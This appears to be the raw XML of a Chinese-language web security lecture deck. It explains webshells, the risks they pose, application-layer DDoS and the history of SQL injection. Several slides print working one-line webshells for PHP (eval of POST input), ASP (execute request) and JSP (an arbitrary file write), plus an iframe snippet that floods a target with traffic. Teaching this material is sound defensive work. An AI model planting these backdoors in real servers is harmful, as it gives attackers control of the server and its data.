              <a:t>提供的功能是恶意的，如执行系统命令，而普通的网页脚本文件提供的功能是正常的业务功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网页木马有大马和小马之分，小马就是我们常说的一句话木马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6570882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WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一句话木马案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的一个一句话木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>'a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
              <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的一个一句话木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>%&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的一个一句话木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>	&lt;% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>%&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
              <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10618306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WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>马案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="内容占位符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5656" y="1052736"/>
            <a:ext cx="6408711" cy="5297699"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291821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WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网页木马风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果能够上传到服务器，基本上这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器就被拿下了，它是攻击者的一个后门，攻击者可以随时访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务器，获取敏感数据，或者把此服务器作为肉机，发起新一轮的攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目前攻击者都喜欢利用小马执行大马，因为小马的隐蔽性强，不易被发现而功能丝毫不弱于大马。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55394007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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击就是通过制造大量的并发的消耗资源的应用页面请求，以达到消耗服务器端资源的目的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击是应用层面的攻击，不同于网络层的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，但应用层的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有时甚至比网络层的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击更可怕。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3814670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安全的里程碑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入的出现是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全史上的一个里程碑，它大概出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年，并很快就成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全的头号大敌，程序员们不得不日以夜继地去修改程序中存在的漏洞。黑客们发现通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入攻击，可以获取很多重要的、敏感的数据，甚至能够获取系统访问权限，这种效果并不比直接攻击系统软件差，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击一下子就流行起来。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350426284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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>互联网中充斥着各种搜索引擎、信息收集等爬虫，爬虫把小网站直接爬死的情况常有发生，这是因为爬虫可以制造大量的并发请求，是发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击的一种方式。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>黑客在入侵了一个流量很大的网站后，通过篡改页面，将巨大的用户流量分流到目标网站，如在大流量网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>插入一段代码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=“http://[IP]/target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>”&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:ea typeface="NSimSun" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>iframe&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，那么所有访问该页面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户，都将对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>发起一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>拒绝服务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用网站自身的漏洞或设计缺陷进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
